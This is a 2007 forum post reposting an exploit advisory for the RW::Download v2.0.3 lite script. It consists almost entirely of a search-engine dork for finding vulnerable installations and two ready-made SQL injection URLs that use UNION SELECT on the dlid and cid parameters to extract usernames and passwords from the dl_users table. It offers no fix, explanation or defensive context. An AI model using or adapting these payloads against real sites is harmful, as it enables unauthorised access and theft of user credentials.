Ras Posted September 8, 2007 Report Posted September 8, 2007 ######################################################################## # RW::Download v2.0.3 lite - Remote SQL Injection # Vendor : [url]http://www.rwscripts.com/[/url] # Ditemukan oleh : k1tk4t - k1tk4t[4t]newhack.org # Lokasi : Indonesia -- #newhack[dot]org @ irc.dal.net # Dork : "Powered by RW::Download v2.0.3 lite" ################################################# [url]http://localhost/UPLOAD/index.php?url=&dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users/*[/url] http://localhost/UPLOAD/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/* Quote